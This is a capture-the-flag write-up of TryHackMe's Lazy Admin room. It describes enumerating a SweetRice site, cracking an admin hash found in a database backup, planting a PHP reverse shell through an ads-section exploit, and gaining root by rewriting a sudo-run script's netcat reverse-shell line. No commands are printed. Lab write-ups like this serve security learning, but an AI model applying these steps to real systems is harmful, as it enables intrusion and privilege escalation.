Write-up of TryHackMe’s Lazy Admin room.
Welcome back to another write-up of an “easy” TryHackMe room. If you want to try it before reading you can find it here: LazyAdmin.
This is my shorter and more edited version of the write-up. If you want to read the more detailed step-by-step write-up including the stuff that didn’t work check out my Realistic Write-up.
This was a fun room that was frustrating at times. To find the two flags we’re going to use a number of different methods we learn in TryHackMe’s educational rooms such as: NMAP scanning, GoBuster website brute-forcing, and a reverse shell.
First we connect to TryHackMe and start the machine. It did take a couple extra minutes for the machine to boot for me so if it’s not working right away, be patient.
Enumeration
Once Ping can see the room we can run NMAP to find open ports. You can run whatever NMAP scan you like (everyone has their favorite) but here’s what I ran:
Nmap should find a couple open ports:
As we can see there is an ssh service on port 22 and an http service on port 80. As with many TryHackMe rooms an open http port usually means there is a website. Plugging in the room’s IP address into our web browser brings us to a default Apache2 welcome page.
From here I tried GoBuster to see if I could find some hidden pages.
Right away it found a /content folder. Navigating to that page shows a SweetRice welcome page. After googling “sweetrice website manager vulnerabilities” we find Exploit-DB has a list of 8 vulnerabilities that might help us.
We’ve got an arbitrary upload and arbitrary download, CSRF, PHP Code Execution, and more. Unfortunately all of them either need an upload page, login creds, or the SweetRice management console, none of which we’ve found yet.
All GoBuster found was the /content/ page but it only looked one level deep, looking in the content folder we find many more options.
Just going down the list we first find a bunch of pictures and a couple .php files in /images. Which reminded me of the last room I did (root me) which used a .php reverse shell. /inc has lots of interesting stuff in it, including more folders. We’ll definitely have to come back here but for now we’re looking for an upload page or console. /as has a login page but we don’t know login info yet.
There was a bunch of stuff in /inc/ so let’s head back there. /mysql_backup/ has an sql file we can download and read. Reading through it we find something very interesting:
Exploitation
Reading through this we see author, keywords, and a bunch of other stuff, but what stood out to me was the word “admin” and “passwd”. The long string after passwd looks like a hash and Crackstation is able to crack it. Since the hash is two blocks after “passwd” does that mean the username is two blocks after “admin”? Let’s head back to the login page and try it.
It works!
Looking through the exploit-DB page and reading through the comments in the “CSRF/PHP Code Execution”. We learn there’s a vulnerability in the ads section that lets an attacker execute php code on the server.
Much like we did in the RootMe room write-up we are going to use pentest monkey’s php reverse shell. First we copy and paste the exploit html code from Exploit-DB into a new advertisement on the SweetRice console.
Then we copy and paste the reverse shell into the html replacing the three lines starting with echo and phpinfo and </textarea. Don’t forget to change the reverse shell code to your IP address and the port you are listening on.
Head back to your browser and navigate to the /ads folder. Click your file and, if it worked, your listener should have a shell. Now we just need to find the user.txt file. Since it’s a linux system the user is usually in the home directory. Navigating there we find /home/itguy/ and find our first flag.
Privilege Escalation
Now we need to figure out how to become root. Looking in the /itguy/ folder we see Backup.pl is a perl script that’s running copy.sh. cat /etc/copy.sh gives us this:
Ok, lets try and figure out what this does. I know “rm” is similar to “delete” so it looks like we start with removing the /tmp/f file. After googling “mkfifo” I learn that it’s similar to the pipe | command but allows other processes to read it while it’s open. Ok, so we are removing /tmp/f and then remaking it as a fifo. I know /bin/sh -i is an interactive shell. I also know that nc is netcat with the ip address and port. I know that you can use cat to input text into a file as you type. Is this a shell that’s making a file from netcat and the interactive shell and putting it in /tmp/f? Can I just replace my IP address and port number and send the shell to my listener instead?
First I cd over to /etc/ and then use echo to rewrite the file with my IP address and port I’m going to listen on.
Then we start a listener on that port too. Now we just need to figure out how to run that file with the shell. Running the command perl /home/itguy/backup.pl gives us some errors but they are “permission denied”. Using sudo
our listener connects!
Which honestly is a little weird. Why does sudo work without a password? We can check a user’s permissions with sudo -l (that’s a lowercase L) and it’ll tell you what itguy can run without a password. Hey, what do you know, it’s perl and backup.pl. That’s…very convenient. I wish I had checked that earlier; that’s a good hint…
Anyway…
we’re root!
This was a fun room and I feel like I learned some stuff. I spent quite a bit of time googling and learning about what that single line shell did. I’m not entirely sure I could reproduce it but at least I understood well enough to guess what it was doing.
I hope you enjoyed reading along. Let me know in the comments if you have questions, suggestions, or criticisms.